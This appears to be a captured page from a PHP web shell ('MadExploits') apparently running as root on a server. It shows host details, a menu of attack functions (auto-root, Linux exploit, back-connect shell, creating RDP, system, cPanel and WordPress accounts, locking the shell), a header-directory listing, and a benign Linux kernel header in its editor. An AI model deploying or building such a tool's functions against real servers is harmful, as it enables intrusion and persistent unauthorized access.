Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.14.243
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
powerpc64le-linux-gnu /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
auxvec.h
1.8
KB
-rw-r--r--
bitsperlong.h
312
B
-rw-r--r--
bootx.h
4.3
KB
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
550
B
-rw-r--r--
cputable.h
2.33
KB
-rw-r--r--
eeh.h
2.18
KB
-rw-r--r--
elf.h
13.09
KB
-rw-r--r--
epapr_hcalls.h
4.16
KB
-rw-r--r--
errno.h
278
B
-rw-r--r--
fcntl.h
367
B
-rw-r--r--
ioctl.h
302
B
-rw-r--r--
ioctls.h
4.26
KB
-rw-r--r--
ipcbuf.h
1.03
KB
-rw-r--r--
kvm.h
25.51
KB
-rw-r--r--
kvm_para.h
2.71
KB
-rw-r--r--
mman.h
1.25
KB
-rw-r--r--
msgbuf.h
1.13
KB
-rw-r--r--
nvram.h
2.01
KB
-rw-r--r--
opal-prd.h
1.73
KB
-rw-r--r--
papr-miscdev.h
184
B
-rw-r--r--
papr-sysparm.h
2.01
KB
-rw-r--r--
papr-vpd.h
538
B
-rw-r--r--
param.h
31
B
-rw-r--r--
perf_event.h
550
B
-rw-r--r--
perf_regs.h
2.68
KB
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
594
B
-rw-r--r--
ps3fb.h
1.74
KB
-rw-r--r--
ptrace.h
7.54
KB
-rw-r--r--
resource.h
34
B
-rw-r--r--
sembuf.h
1.12
KB
-rw-r--r--
setup.h
188
B
-rw-r--r--
shmbuf.h
1.68
KB
-rw-r--r--
sigcontext.h
4.24
KB
-rw-r--r--
siginfo.h
33
B
-rw-r--r--
signal.h
2.49
KB
-rw-r--r--
socket.h
600
B
-rw-r--r--
sockios.h
33
B
-rw-r--r--
spu_info.h
774
B
-rw-r--r--
stat.h
2.31
KB
-rw-r--r--
statfs.h
32
B
-rw-r--r--
swab.h
560
B
-rw-r--r--
termbits.h
4.01
KB
-rw-r--r--
termios.h
1.66
KB
-rw-r--r--
tm.h
734
B
-rw-r--r--
types.h
1.27
KB
-rw-r--r--
ucontext.h
961
B
-rw-r--r--
unistd.h
562
B
-rw-r--r--
unistd_32.h
11.78
KB
-rw-r--r--
unistd_64.h
10.89
KB
-rw-r--r--
vas-api.h
649
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : opal-prd.h
/* SPDX-License-Identifier: GPL-2.0+ WITH Linux-syscall-note */ /* * OPAL Runtime Diagnostics interface driver * Supported on POWERNV platform * * (C) Copyright IBM 2015 * * Author: Vaidyanathan Srinivasan <svaidy at linux.vnet.ibm.com> * Author: Jeremy Kerr <jk@ozlabs.org> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. */ #ifndef _ASM_POWERPC_OPAL_PRD_H_ #define _ASM_POWERPC_OPAL_PRD_H_ #include <linux/types.h> /** * The version of the kernel interface of the PRD system. This describes the * interface available for the /dev/opal-prd device. The actual PRD message * layout and content is private to the firmware <--> userspace interface, so * is not covered by this versioning. * * Future interface versions are backwards-compatible; if a later kernel * version is encountered, functionality provided in earlier versions * will work. */ #define OPAL_PRD_KERNEL_VERSION 1 #define OPAL_PRD_GET_INFO _IOR('o', 0x01, struct opal_prd_info) #define OPAL_PRD_SCOM_READ _IOR('o', 0x02, struct opal_prd_scom) #define OPAL_PRD_SCOM_WRITE _IOW('o', 0x03, struct opal_prd_scom) #ifndef __ASSEMBLY__ struct opal_prd_info { __u64 version; __u64 reserved[3]; }; struct opal_prd_scom { __u64 chip; __u64 addr; __u64 data; __s64 rc; }; #endif /* __ASSEMBLY__ */ #endif /* _ASM_POWERPC_OPAL_PRD_H */
Close